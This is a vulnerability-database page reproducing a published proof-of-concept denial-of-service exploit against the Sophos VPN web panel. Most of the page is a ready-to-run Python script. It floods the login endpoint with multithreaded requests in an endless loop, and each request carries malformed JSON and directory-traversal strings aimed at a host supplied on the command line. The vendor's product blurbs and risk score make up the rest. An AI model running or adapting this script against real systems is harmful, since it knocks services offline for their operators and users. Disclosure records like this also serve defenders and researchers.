Vulners
Lucene search
Sophos VPN Web Panel 2020 - Denial of Service (Poc)
# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
# Date: 2020-06-17
# Exploit Author: Berk KIRAS
# Vendor Homepage: https://www.sophos.com/
# Version:2020 Web Panel
# Tested on: Apache
# Berk KIRAS PwC - Cyber Security Specialist
# Sophos VPN Web Portal Denial of Service Vulnerability
# System parse JSON data. If we want to send some JSON with invalid data format
# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"}
# The system can not parse this data fastly and service down
# payload_option2 ="../../../../../../../../../FILE./FILE"
#!/usr/bin/python3
import requests
import sys
import random
import threading
def send_req():
cnt = random.randint(9,22)
payload= "../"*cnt+'{FILE}'
my_datas_params = {"username":"test",
payload+"password":"admin",
"cookie":"0",
"submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>",
"language":"turkish",
"browser_id":"kbgacsyo-q4j5o7lr70e"}
# You should change some values into the headers
Host_addr = sys.argv[2]
Origin=sys.argv[1]+"://"+sys.argv[2]
Referrer=sys.argv[1]+"://"+sys.argv[2]
Cookie=sys.argv[4]
#Headers
my_datas_headers ={
"Host":str(Host_addr),
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"X-Prototype-Version": "1.6.1_rc3",
"Content-type": "application/json; charset=UTF-8",
"Origin":Origin,
"Connection": "close",
"Referer":Referrer,
"Cookie":Cookie,
}
my_datas_headers2 ={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"X-Prototype-Version": "1.6.1_rc3",
"Content-type": "application/json; charset=UTF-8",
"Connection": "close",
}
#If you want to edit and add headers some headers added
s = requests.session()
#if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
s.headers.update(my_datas_headers2)
print(s.headers.items)
r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params)
return s
def main():
if(len(sys.argv) < 6):
print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber")
sys.exit(0)
else:
try:
req_count=0
while(True):
if(int(sys.argv[5])==1):
resp = send_req()
req_count=req_count+1
print("Sending Requests... Count: "+str(req_count))
else:
threads = int(sys.argv[5])
jobs = []
for i in range(0, threads):
out_list = list()
thread = threading.Thread(target=send_req)
jobs.append(thread)
for j in jobs:
j.start()
print("Jobs Started!")
# Ensure all of the threads have finished
for j in jobs:
j.join()
except Exception:
print(Exception)
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jul 2020 00:00Current
7.4High risk
Vulners AI Score7.4